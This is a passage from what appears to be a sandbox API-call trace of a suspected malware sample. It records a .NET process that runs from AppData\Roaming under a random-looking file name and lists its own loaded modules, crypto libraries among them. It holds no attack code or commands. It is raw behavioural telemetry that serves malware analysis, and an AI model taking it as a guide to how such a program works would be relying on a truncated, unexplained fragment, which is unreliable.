hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x23b0788, cb=0xc | out: lpmodinfo=0x23b0788*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0141.865] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.865] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0141.866] CoTaskMemFree (pv=0x55ab38) [0141.866] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.866] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0141.867] CoTaskMemFree (pv=0x55ab38) [0141.867] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x23b2ab8, cb=0xc | out: lpmodinfo=0x23b2ab8*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0141.868] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.868] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0141.912] CoTaskMemFree (pv=0x55ab38) [0141.912] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.912] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0141.913] CoTaskMemFree (pv=0x55ab38) [0141.913] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x23b4bc4, cb=0xc | out: lpmodinfo=0x23b4bc4*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0141.915] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.915] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0141.920] CoTaskMemFree (pv=0x55ab38) [0141.920] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.920] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0141.921] CoTaskMemFree (pv=0x55ab38) [0141.921] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x23b6cd0, cb=0xc | out: lpmodinfo=0x23b6cd0*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0141.923] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.923] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0141.925] CoTaskMemFree (pv=0x55ab38) [0141.925] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.925] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0141.926] CoTaskMemFree (pv=0x55ab38) [0141.926] CloseHandle (hObject=0x2a0) returned 1 [0141.956] GetCurrentProcessId () returned 0xbb4 [0141.956] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0141.956] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23df8b0, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x23df8b0, lpcbNeeded=0x19e600) returned 1 [0141.957] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x23df9bc, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x23df9bc, lpcbNeeded=0x19e600) returned 1 [0141.958] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x23dfbfc, cb=0xc | out: lpmodinfo=0x23dfbfc*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0141.958] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.958] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0141.959] CoTaskMemFree (pv=0x55ab38) [0141.959] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.959] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0141.959] CoTaskMemFree (pv=0x55ab38) [0141.959] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x23e1e08, cb=0xc | out: lpmodinfo=0x23e1e08*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0141.959] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.959] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0141.959] CoTaskMemFree (pv=0x55ab38) [0141.959] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.959] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0141.960] CoTaskMemFree (pv=0x55ab38) [0141.960] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x23e3f0c, cb=0xc | out: lpmodinfo=0x23e3f0c*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0141.960] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.960] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0141.960] CoTaskMemFree (pv=0x55ab38) [0141.960] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.960] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0141.960] CoTaskMemFree (pv=0x55ab38) [0141.960] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x23e6018, cb=0xc | out: lpmodinfo=0x23e6018*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0141.961] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.961] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0141.961] CoTaskMemFree (pv=0x55ab38) [0141.961] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.961] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0141.961] CoTaskMemFree (pv=0x55ab38) [0141.961] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x23e812c, cb=0xc | out: lpmodinfo=0x23e812c*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0141.961] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.961] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0141.962] CoTaskMemFree (pv=0x55ab38) [0141.962] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.962] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0141.962] CoTaskMemFree (pv=0x55ab38) [0141.962] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x23ea274, cb=0xc | out: lpmodinfo=0x23ea274*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0141.962] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.962] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0141.987] CoTaskMemFree (pv=0x55ab38) [0141.987] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.987] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0141.988] CoTaskMemFree (pv=0x55ab38) [0141.988] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x23ec380, cb=0xc | out: lpmodinfo=0x23ec380*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0141.988] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.988] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0141.988] CoTaskMemFree (pv=0x55ab38) [0141.988] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.989] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0141.989] CoTaskMemFree (pv=0x55ab38) [0141.989] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x23ee494, cb=0xc | out: lpmodinfo=0x23ee494*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0141.989] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.989] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0141.990] CoTaskMemFree (pv=0x55ab38) [0141.990] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.990] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0141.990] CoTaskMemFree (pv=0x55ab38) [0141.990] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x23f05a0, cb=0xc | out: lpmodinfo=0x23f05a0*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0141.990] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.991] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0141.991] CoTaskMemFree (pv=0x55ab38) [0141.991] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.991] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0141.991] CoTaskMemFree (pv=0x55ab38) [0141.991] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x23f26f8, cb=0xc | out: lpmodinfo=0x23f26f8*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0141.992] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.992] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0141.992] CoTaskMemFree (pv=0x55ab38) [0141.992] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.992] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0141.992] CoTaskMemFree (pv=0x55ab38) [0141.992] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x23f4804, cb=0xc | out: lpmodinfo=0x23f4804*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0141.993] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.993] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0141.993] CoTaskMemFree (pv=0x55ab38) [0141.993] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.993] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0141.993] CoTaskMemFree (pv=0x55ab38) [0141.993] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x23f6910, cb=0xc | out: lpmodinfo=0x23f6910*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0141.998] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.998] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0141.998] CoTaskMemFree (pv=0x55ab38) [0141.998] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.998] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0141.999] CoTaskMemFree (pv=0x55ab38) [0141.999] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x23f8a24, cb=0xc | out: lpmodinfo=0x23f8a24*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0141.999] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.999] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0141.999] CoTaskMemFree (pv=0x55ab38) [0141.999] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.999] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0142.000] CoTaskMemFree (pv=0x55ab38) [0142.000] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x23fab58, cb=0xc | out: lpmodinfo=0x23fab58*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0142.000] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.000] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0142.001] CoTaskMemFree (pv=0x55ab38) [0142.001] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.001] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0142.001] CoTaskMemFree (pv=0x55ab38) [0142.001] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x23fcca0, cb=0xc | out: lpmodinfo=0x23fcca0*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0142.001] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.001] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0142.002] CoTaskMemFree (pv=0x55ab38) [0142.002] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.002] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0142.002] CoTaskMemFree (pv=0x55ab38) [0142.002] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x23fedac, cb=0xc | out: lpmodinfo=0x23fedac*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0142.003] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.003] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0142.003] CoTaskMemFree (pv=0x55ab38) [0142.003] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.003] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0142.004] CoTaskMemFree (pv=0x55ab38) [0142.004] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x2400eb8, cb=0xc | out: lpmodinfo=0x2400eb8*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0142.004] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.004] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0142.005] CoTaskMemFree (pv=0x55ab38) [0142.005] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.005] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0142.005] CoTaskMemFree (pv=0x55ab38) [0142.005] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x2403048, cb=0xc | out: lpmodinfo=0x2403048*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0142.005] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.006] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0142.006] CoTaskMemFree (pv=0x55ab38) [0142.006] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.006] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0142.006] CoTaskMemFree (pv=0x55ab38) [0142.007] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x2405154, cb=0xc | out: lpmodinfo=0x2405154*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0142.007] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.007] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0142.007] CoTaskMemFree (pv=0x55ab38) [0142.008] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.008] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0142.008] CoTaskMemFree (pv=0x55ab38) [0142.008] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x2407258, cb=0xc | out: lpmodinfo=0x2407258*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0142.009] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.009] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0142.009] CoTaskMemFree (pv=0x55ab38) [0142.009] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.009] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0142.016] CoTaskMemFree (pv=0x55ab38) [0142.016] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x2409384, cb=0xc | out: lpmodinfo=0x2409384*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0142.017] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.017] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0142.017] CoTaskMemFree (pv=0x55ab38) [0142.017] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.017] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0142.018] CoTaskMemFree (pv=0x55ab38) [0142.018] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x240b490, cb=0xc | out: lpmodinfo=0x240b490*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0142.018] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.018] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0142.019] CoTaskMemFree (pv=0x55ab38) [0142.019] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.019] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0142.019] CoTaskMemFree (pv=0x55ab38) [0142.019] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x240d5c0, cb=0xc | out: lpmodinfo=0x240d5c0*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0142.020] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.020] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0142.020] CoTaskMemFree (pv=0x55ab38) [0142.021] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.021] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0142.021] CoTaskMemFree (pv=0x55ab38) [0142.021] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x240f6f4, cb=0xc | out: lpmodinfo=0x240f6f4*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0142.022] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.022] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0142.022] CoTaskMemFree (pv=0x55ab38) [0142.022] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.022] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0142.023] CoTaskMemFree (pv=0x55ab38) [0142.023] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x241189c, cb=0xc | out: lpmodinfo=0x241189c*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0142.023] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.023] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0142.024] CoTaskMemFree (pv=0x55ab38) [0142.024] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.024] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0142.025] CoTaskMemFree (pv=0x55ab38) [0142.025] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x24139a0, cb=0xc | out: lpmodinfo=0x24139a0*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0142.026] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.026] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0142.026] CoTaskMemFree (pv=0x55ab38) [0142.026] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.026] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0142.027] CoTaskMemFree (pv=0x55ab38) [0142.027] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, 